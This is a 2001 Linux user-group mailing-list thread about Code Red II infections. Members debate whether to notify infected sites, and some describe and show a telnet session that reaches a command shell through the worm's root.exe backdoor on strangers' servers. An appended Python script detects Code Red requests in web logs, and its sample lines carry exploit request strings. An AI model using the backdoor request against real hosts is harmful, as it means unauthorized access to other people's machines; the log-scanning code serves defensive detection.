CR worm infection attempts
George Toft
plug-discuss@lists.PLUG.phoenix.az.us
Thu, 09 Aug 2001 08:03:37 -0700
If you are walking down the street, and see a house with the door
open, do you walk in to see if anyone is home? When you return, and
see the windows broken out, and the outside spray-painted, how do you
feel? I think this is a similar situation - if you walk in uninvited,
it's called "illegal entry" and you may be arrested. Likewise, testing
a site to see if it has been exploited is illegal as you were accessing
their computer in an unauthorized fashion.
Could you have stopped the crimes in both cases? Maybe (if the owner
listened to you). Is it worth the risk to you, your reputation, and
your family? No. I am not selfish - I am placing my family ahead of
strangers, and they rely upon my income. I suggest you do the same -
just keep on walking, and make sure you have the safeguards of Fort
Knox at home.
George
Derek Neighbors wrote:
>
> That is the problem.
>
> I looked at my logs out of curiosity. I was AMAZED at the figures. I
> took the first IP and hit it and checked for the root.exe exploit. Sure
> enough it was WIDE open.
>
> Now I had a DILEMMA on my hands. Do I notify this company or not? I had
> no malicious intent nor did I do anything. The 'good' in me wanted to
> notify them so that they were not 'toasted' by one with 'ill' intent.
>
> HOWEVER, I feared lawsuit, death and dismemberment. So I said not a word.
> I looked at their website about 4 hours later and they were defaced. :(
>
> What kind of a world is it? I mean if I was walking down the street with
> my fly open, I would hope to God someone would tell me. However, I
> suppose even in that case you should be careful. I mean after all,
> notifying someone that their fly was open means you were looking at
> their crotch. If you were looking at their crotch you must have been
> wanting to rape them or harass them.
>
> Where does the silliness stop?
>
> -Derek
>
> On Wed, 8 Aug 2001, Kim Allen wrote:
>
> > I've been contacting the sites that my server logs show have been
> > hitting me with the Code Red signature and so far no one has bothered to
> > respond except for one. However, that site has told me how secure they are
> > and how there is no way that they have any problems. When I sent them the
> > portions of my server logs showing they do have a problem they threatened
> > legal action. Has anyone else had this type of response?
> >
> > > To answer your question... make sure you're hitting enter TWICE after
> > > the command.
> > >
> > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > Check it out:
> > >
> > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > Trying xxx.xxx.xxx.xxx...
> > > Connected to xxx.xxx.xxx.xxx.
> > > Escape character is '^]'.
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > HTTP/1.1 200 OK
> > > Server: Microsoft-IIS/5.0
> > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > Content-Type: application/octet-stream
> > > Microsoft Windows 2000 [Version 5.00.2195]
> > > (C) Copyright 1985-1999 Microsoft Corp.
> > >
> > > c:\inetpub\scripts>
> > >
> > > From here, I've been leaving a nice text file on the \\ALL USERS\\ desktops
> > > that explains how I did it, and why they need to pay attention to
> > > security patches. :)
> > >
> > > Hopefully they won't take it the 'wrong' way.
> > >
> > > ~g~
> > >
> > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > Wayne Conrad wrote:
> > > > >
> > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > keep recreating the same data each time.
> > > > >
> > > > > Are you putting the IPs up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > Wayne
> > > > ________________________________________________
> > > >
> > > > I've been trying that out
> > > >
> > > > telnet ipaddress_from_my_httpd_access_log 80
> > > >
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > but I can't get a command prompt - what am I missing?
> > > >
> > > > Craig
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > >
> >
>
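Several people in this thread mention pulling the Code Red signature and the root.exe requests out of their own web server logs to build complaint reports. The script below is an added example, not code from anyone on the list: it scans constructed Apache-format log lines for the worm's /default.ida propagation request and for requests to the root.exe/cmd.exe backdoor paths that Code Red II exposes, and groups the hits by source address with the raw evidence lines. The sample log lines and the 192.0.2.x / 198.51.100.x addresses are constructed, and the cmd.exe paths are taken from the worm's known behaviour rather than from the thread.

```python
import re
from collections import Counter, defaultdict

# Request-path markers for Code Red traffic. /default.ida is the worm's
# propagation request (the .ida ISAPI overflow, padded with N or X);
# /scripts/root.exe is the backdoor the thread's telnet session requests.
# The /msadc and /c,/d cmd.exe paths are the other backdoor locations
# Code Red II leaves behind (known worm behaviour, assumed here, not from the page).
SIGNATURES = {
    "codered-propagation": re.compile(r"^/default\.ida\?[NX]{20,}", re.I),
    "crii-backdoor-probe": re.compile(
        r"^/(scripts|msadc)/root\.exe|^/[cd]/winnt/system32/cmd\.exe", re.I),
}

# Apache common/combined log: host ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def classify(path):
    """Return the matching signature name for a request path, or None."""
    for name, rx in SIGNATURES.items():
        if rx.search(path):
            return name
    return None

def scan(lines):
    """Return ({ip: Counter(signature)}, {ip: [raw matching lines]})."""
    hits = defaultdict(Counter)
    evidence = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line, skip it
        tag = classify(m.group("path"))
        if tag:
            hits[m.group("ip")][tag] += 1
            evidence[m.group("ip")].append(line)
    return hits, evidence

# Constructed sample log lines (documentation-range addresses, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2001:10:01:12 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 276',
    '192.0.2.10 - - [08/Aug/2001:10:01:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 289',
    '198.51.100.7 - - [08/Aug/2001:10:02:40 -0700] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.7 - - [08/Aug/2001:10:02:41 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291',
]

if __name__ == "__main__":
    found, proof = scan(SAMPLE_LOG)
    for ip, counts in found.items():
        print(ip, dict(counts))
        for raw in proof[ip]:
            print("   ", raw)
```

Pointing the scan at a real access log means reading the file into `scan()` line by line; the per-address evidence list is what you would attach to an abuse report.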